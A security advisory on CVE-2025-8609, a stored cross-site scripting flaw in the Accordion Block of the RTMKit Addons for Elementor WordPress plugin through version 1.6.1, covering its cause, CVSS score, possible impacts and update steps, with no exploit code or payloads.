Overview
A significant security vulnerability, identified as CVE-2025-8609, has been discovered in the RTMKit Addons for Elementor plugin for WordPress. This flaw is a Stored Cross-Site Scripting (XSS) vulnerability that could allow attackers to inject malicious scripts into your website. This vulnerability affects all versions up to and including 1.6.1 of the RTMKit Addons for Elementor plugin.
Technical Details
The vulnerability resides within the Accordion Block of the plugin. Specifically, the issue stems from insufficient input sanitization and output escaping on user-supplied attributes within the Accordion block’s settings. This means that an authenticated attacker with contributor-level access or higher can inject arbitrary web scripts into pages containing the affected Accordion Block. These scripts will then execute whenever a user accesses the compromised page.
The vulnerable code can be seen in the rkit_image_accordion.php file (see reference).
CVSS Analysis
- CVE ID: CVE-2025-8609
- Severity: MEDIUM
- CVSS Score: 6.4
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
A CVSS score of 6.4 indicates a medium severity vulnerability. The vulnerability requires user interaction and leverages stored code execution. Even with the requirement of user interaction and contributor access this still poses a significant security risk.
Possible Impact
A successful exploit of this vulnerability can have severe consequences, including:
- Account Takeover: Attackers can potentially steal user session cookies and gain unauthorized access to administrator or other privileged accounts.
- Malware Distribution: Inject malicious code to redirect users to phishing sites or distribute malware.
- Website Defacement: Modify website content, causing reputational damage.
- Data Theft: Attempt to steal sensitive data displayed on the affected pages.
Mitigation and Patch Steps
The recommended course of action is to immediately update the RTMKit Addons for Elementor plugin to the latest version. The fix for this vulnerability is included in versions released after 1.6.1.
To update the plugin:
- Log in to your WordPress admin dashboard.
- Navigate to “Plugins” -> “Installed Plugins”.
- Locate the “RTMKit Addons for Elementor” plugin.
- Click the “Update Now” button if an update is available.
If an update is not available, consider temporarily disabling the plugin until an updated version is released. Additionally, it is highly recommended to review and audit your WordPress website’s security posture regularly.
